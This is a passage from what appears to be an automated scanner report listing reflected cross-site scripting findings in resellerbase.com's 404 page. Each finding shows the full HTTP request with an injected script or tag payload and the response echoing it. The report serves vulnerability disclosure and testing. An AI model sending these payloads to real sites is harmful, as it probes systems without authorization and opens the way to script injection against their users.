The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d66d0<script>alert(1)</script>752c46dda40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild66d0<script>alert(1)</script>752c46dda40/44/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild66d0<script>alert(1)</script>752c46dda40/44/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3093. http://www.resellerbase.com/detail/44/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 30557<script>alert(1)</script>3faaff26051 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4430557<script>alert(1)</script>3faaff26051/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4430557<script>alert(1)</script>3faaff26051/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3094. http://www.resellerbase.com/detail/44/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96f2f<script>alert(1)</script>dfcfd691548 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/search.php96f2f<script>alert(1)</script>dfcfd691548?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php96f2f<script>alert(1)</script>dfcfd691548?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3095. http://www.resellerbase.com/detail/44/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ca879<a>14873da87e3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/search.php?keyword=search...&Submit3=Searchca879<a>14873da87e3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...&Submit3=Searchca879<a>14873da87e3&opt=2 was not found on this server.</p>
...[SNIP]...

2.3096. http://www.resellerbase.com/detail/44/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 535c7<a>8503759ab91 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/search.php?keyword=search...535c7<a>8503759ab91&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...535c7<a>8503759ab91&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3097. http://www.resellerbase.com/detail/44/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79245<script>alert(1)</script>fec79c6ebe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/search.php?keyword=search...&Submit3=Search&opt=2&79245<script>alert(1)</script>fec79c6ebe4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...&Submit3=Search&opt=2&79245<script>alert(1)</script>fec79c6ebe4=1 was not found on this server.</p>
...[SNIP]...

2.3098. http://www.resellerbase.com/detail/44/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c781d<a>831852012b1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/search.php?keyword=search...&Submit3=Search&opt=2c781d<a>831852012b1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...&Submit3=Search&opt=2c781d<a>831852012b1 was not found on this server.</p>
...[SNIP]...

2.3099. http://www.resellerbase.com/detail/44/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 755fb<script>alert(1)</script>36793ad95ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail755fb<script>alert(1)</script>36793ad95ea/44/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail755fb<script>alert(1)</script>36793ad95ea/44/themes/ was not found on this server.</p>
...[SNIP]...

2.3100. http://www.resellerbase.com/detail/44/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9f08<script>alert(1)</script>10fa56f23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44d9f08<script>alert(1)</script>10fa56f23/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44d9f08<script>alert(1)</script>10fa56f23/themes/ was not found on this server.</p>
...[SNIP]...

2.3101. http://www.resellerbase.com/detail/44/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a1af<script>alert(1)</script>60eac0a129e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes4a1af<script>alert(1)</script>60eac0a129e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes4a1af<script>alert(1)</script>60eac0a129e/ was not found on this server.</p>
...[SNIP]...

2.3102. http://www.resellerbase.com/detail/44/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9062c<script>alert(1)</script>d0dc6c6000c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/?9062c<script>alert(1)</script>d0dc6c6000c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/?9062c<script>alert(1)</script>d0dc6c6000c=1 was not found on this server.</p>
...[SNIP]...

2.3103. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82cfb<script>alert(1)</script>5f6ae23dbd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail82cfb<script>alert(1)</script>5f6ae23dbd1/44/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail82cfb<script>alert(1)</script>5f6ae23dbd1/44/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3104. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8dde0<script>alert(1)</script>7b915b7e4b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/448dde0<script>alert(1)</script>7b915b7e4b7/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/448dde0<script>alert(1)</script>7b915b7e4b7/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3105. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bcd8a<script>alert(1)</script>353fe54d8c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesbcd8a<script>alert(1)</script>353fe54d8c4/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesbcd8a<script>alert(1)</script>353fe54d8c4/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3106. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1220<script>alert(1)</script>a84f1d4fbb5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmosf1220<script>alert(1)</script>a84f1d4fbb5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmosf1220<script>alert(1)</script>a84f1d4fbb5/ was not found on this server.</p>
...[SNIP]...

2.3107. http://www.resellerbase.com/detail/44/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 55c55<script>alert(1)</script>32df31581d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/?55c55<script>alert(1)</script>32df31581d8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/?55c55<script>alert(1)</script>32df31581d8=1 was not found on this server.</p>
...[SNIP]...

2.3108. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0926<script>alert(1)</script>caafe5879c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild0926<script>alert(1)</script>caafe5879c/44/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild0926<script>alert(1)</script>caafe5879c/44/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3109. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee9a3<script>alert(1)</script>4229fe8d429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44ee9a3<script>alert(1)</script>4229fe8d429/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44ee9a3<script>alert(1)</script>4229fe8d429/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3110. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1134<script>alert(1)</script>b995f995571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesb1134<script>alert(1)</script>b995f995571/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3111. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bd55<script>alert(1)</script>c8caf12d1a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos4bd55<script>alert(1)</script>c8caf12d1a3/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
